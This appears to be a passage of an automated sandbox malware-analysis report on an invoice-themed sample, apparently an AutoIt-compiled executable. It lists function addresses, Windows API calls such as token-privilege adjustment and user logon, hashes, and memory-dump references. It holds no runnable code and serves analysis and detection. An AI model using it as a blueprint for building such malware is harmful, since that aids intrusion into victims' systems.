                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: a4431e9abfdecdadb9004df9c791f8803d605a03a49c7a2ae6b26f2ef4b7363d
                                                                                                                    • Instruction ID: 6f048f1682c3480c722b352e4dc348f6b35958dd19b9c907f277fff713bc2a18
                                                                                                                    • Opcode Fuzzy Hash: a4431e9abfdecdadb9004df9c791f8803d605a03a49c7a2ae6b26f2ef4b7363d
                                                                                                                    • Instruction Fuzzy Hash: AB11A5716106009FDB10DF29D84996AF7E8FF45321F14851EF8A5CB291DB30AC15CF85
                                                                                                                    Function 002BA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,002C9468,?,002DFB84,?), ref: 002BA097
                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,002C9468,?,002DFB84,?), ref: 002BA0A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 2d1e6a2a29f15fa3bf9bf9f4455db4b9bc8340d516fa4e6f34ec4bfb79edc928
                                                                                                                    • Instruction ID: 166cf30e6fee2c024257edabadf368098bc01d44b4ff180a5e531c7eab4babb9
                                                                                                                    • Opcode Fuzzy Hash: 2d1e6a2a29f15fa3bf9bf9f4455db4b9bc8340d516fa4e6f34ec4bfb79edc928
                                                                                                                    • Instruction Fuzzy Hash: 9BF0E23552622DBBDB60AFA4DC48FEA736CBF08361F0081A6FC1AD6180C6309910CBA1
                                                                                                                    Function 002A81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8309), ref: 002A81E0
                                                                                                                    • CloseHandle.KERNEL32(?,?,002A8309), ref: 002A81F2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    • Opcode ID: bdba615e56c7b45316b7a1434ad86dbc76d78506c693992ed4ee4e68d06087c5
                                                                                                                    • Instruction ID: 454b57e4f94632c6f68ffbf89c43cef62e4fb9c57fcd5de3b76bb9e13c2e1eff
                                                                                                                    • Opcode Fuzzy Hash: bdba615e56c7b45316b7a1434ad86dbc76d78506c693992ed4ee4e68d06087c5
                                                                                                                    • Instruction Fuzzy Hash: FBE04632021A10EFE7612B20FC08D737BEAEB04310714C82AB8AA80430CB72ACA0DB10
                                                                                                                    Function 0027A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00278D57,?,?,?,00000001), ref: 0027A15A
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0027A163
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
                                                                                                                    • Instruction ID: 9ff05b1e8d1e85512cb73e41824b74a20cfe9277360aed6246e3edda3dc73465
                                                                                                                    • Opcode Fuzzy Hash: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
                                                                                                                    • Instruction Fuzzy Hash: 99B09231455248ABCAC02B95FD0DB883F68EB44AA2F4180A2FE0E84060CB6258508A99
                                                                                                                    Function 0027F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
                                                                                                                    • Instruction ID: 49591ba1d1aca478905cdf12969bebd3b0280bf53db71bcffd088dd4a5914a89
                                                                                                                    • Opcode Fuzzy Hash: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
                                                                                                                    • Instruction Fuzzy Hash: A2320222D79F814DD7639A34E976335A248AFB73C8F15D73BE819B99A5EB38C4834100
                                                                                                                    Function 0028242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
                                                                                                                    • Instruction ID: 93b466610b429f2c91811c75410da191dde12aa291ea9c5dbb994176c1c73cac
                                                                                                                    • Opcode Fuzzy Hash: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
                                                                                                                    • Instruction Fuzzy Hash: 23B11F20D6AF804DD323A6399875336B74CAFBB2C5F52D71BFC2678D62EB2190834241
                                                                                                                    Function 002B4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002B4C4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    • Opcode ID: 82edb523e1bfcb2d3479e584ed534804251ae08ebe12d508db2f176831548789
                                                                                                                    • Instruction ID: 6a1786fba65a6d0768f06120a555dca5d82cca83ddbef98e6919d5d2a3c8eed4
                                                                                                                    • Opcode Fuzzy Hash: 82edb523e1bfcb2d3479e584ed534804251ae08ebe12d508db2f176831548789
                                                                                                                    • Instruction Fuzzy Hash: 53D05E9117620A38EC5C2F20AE8FFFA0A08E300FCAFD8C18B76028A0C3ECE05C605035
                                                                                                                    Function 002A87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002A8389), ref: 002A87D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LogonUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1244722697-0
                                                                                                                    • Opcode ID: c3154eb5025181ffd8357e6ed18d04d79eb7b2920d6f94ebe49b0d21b7ae637e
                                                                                                                    • Instruction ID: 28aae296ab75f9c3c1be57ebc8185d81a69417abbcb9d3fd3790941d82762fc5
                                                                                                                    • Opcode Fuzzy Hash: c3154eb5025181ffd8357e6ed18d04d79eb7b2920d6f94ebe49b0d21b7ae637e
                                                                                                                    • Instruction Fuzzy Hash: 3DD05E3226050EABEF018EA4ED05EAE3B69EB04B01F408111FE16C61A1C775D935AB60
                                                                                                                    Function 0027A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0027A12A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 666793bc01bc300e0e8f2d42c25d927b36fc6c44582d057f1d7725a3a860d072
                                                                                                                    • Instruction ID: 4ef6534a693a9a4c3f29c7bfdc7719f7bacd8f4e3908aa18c591c863a901c23a
                                                                                                                    • Opcode Fuzzy Hash: 666793bc01bc300e0e8f2d42c25d927b36fc6c44582d057f1d7725a3a860d072
                                                                                                                    • Instruction Fuzzy Hash: 80A0123000010CA7CA401B45FC084447F5CD6001907004061FC0D40021873258104584
                                                                                                                    Function 00268808 Relevance: .6, Instructions: 590COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c1475f8607be95c8b4752c0dc956db7c7df3fd7eb81f3565a2561ab6f2c4eecf
                                                                                                                    • Instruction ID: 338b124f629cdba813d0c4ce77739b905736068d992a28dffeec8ddb2051ceeb
                                                                                                                    • Opcode Fuzzy Hash: c1475f8607be95c8b4752c0dc956db7c7df3fd7eb81f3565a2561ab6f2c4eecf
                                                                                                                    • Instruction Fuzzy Hash: 33223530534567CBDF288EA4C49477EB7A1FB42304F28826BD9469B692DFB09DF1CA41
                                                                                                                    Function 002721C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                    • Instruction ID: 3953bc27570286a5226d7f51e1d3d90014c2e9e783b1de3cfd394cf03e9ca52a
                                                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                    • Instruction Fuzzy Hash: 89C1AA322250934ADF2D4A3D843503EFBA15EA27B131A875DD8BBDB1D5EE30C979D610
                                                                                                                    Function 002725FA Relevance: .3, Instructions: 341COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction ID: 9211b47971c1bc0aca4c131b2eab3ce53786d22d5ed962d233e26a76a9cc1515
                                                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction Fuzzy Hash: E5C1A73222519349DF2D4A3EC43503EFAA15EA27B131A876DD4BBDB1D4EE30C938D620
                                                                                                                    Function 00271978 Relevance: .3, Instructions: 323COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction ID: 744f060b5d4ed3caeed3cda1088847e79e1d5d6c952c6fa20cdb6c088123507c
                                                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction Fuzzy Hash: 49C1853222519309DF2D4A3DC47613EBAA15EA2BB131A975DD4BBDB1C4EE30C935DA10
                                                                                                                    Function 002C7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002C785B
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002C786D
                                                                                                                    • DestroyWindow.USER32 ref: 002C787B
                                                                                                                    • GetDesktopWindow.USER32 ref: 002C7895
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002C789C
                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002C79DD
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002C79ED
                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7A35
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 002C7A41
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002C7A7B
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7A9D
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AB0
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7ABB
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002C7AC4
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AD3
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002C7ADC
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AE3
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 002C7AEE
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7B00
                                                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,002E2CAC,00000000), ref: 002C7B16
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 002C7B26
                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 002C7B4C
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 002C7B6B
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7B8D
                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7D7A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                    • Opcode ID: 9f429adfa10ac2e0acf17348a94245a5867909361c8b905ff68269850126e490
                                                                                                                    • Instruction ID: ed5e6ab468072b0857f21ef96420ffa6e8aa5b57a73784b29f0f3dd057110ce2
                                                                                                                    • Opcode Fuzzy Hash: 9f429adfa10ac2e0acf17348a94245a5867909361c8b905ff68269850126e490
                                                                                                                    • Instruction Fuzzy Hash: EA028A71920115EFDB14DFA4DD89EAE7BB9EF48310F148259F916AB2A0CB30AD11CF64
                                                                                                                    Function 002D356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,002DF910), ref: 002D3627
                                                                                                                    • IsWindowVisible.USER32(?), ref: 002D364B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                    • Opcode ID: 1e1c88620b8ee313c0e8b9c452ad6b2e5bf153951b3babc1fb25fd075eb9918d
                                                                                                                    • Instruction ID: 67805ccb1d6c6de3697fc92158d419e6b133559b42a7f68062d8b833a6d6f9aa
                                                                                                                    • Opcode Fuzzy Hash: 1e1c88620b8ee313c0e8b9c452ad6b2e5bf153951b3babc1fb25fd075eb9918d
                                                                                                                    • Instruction Fuzzy Hash: AAD19F30234301DBCB04EF10C466A6E77A5AF55754F14845AF8865B3E2CB71DE6ACF46
                                                                                                                    Function 002DA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
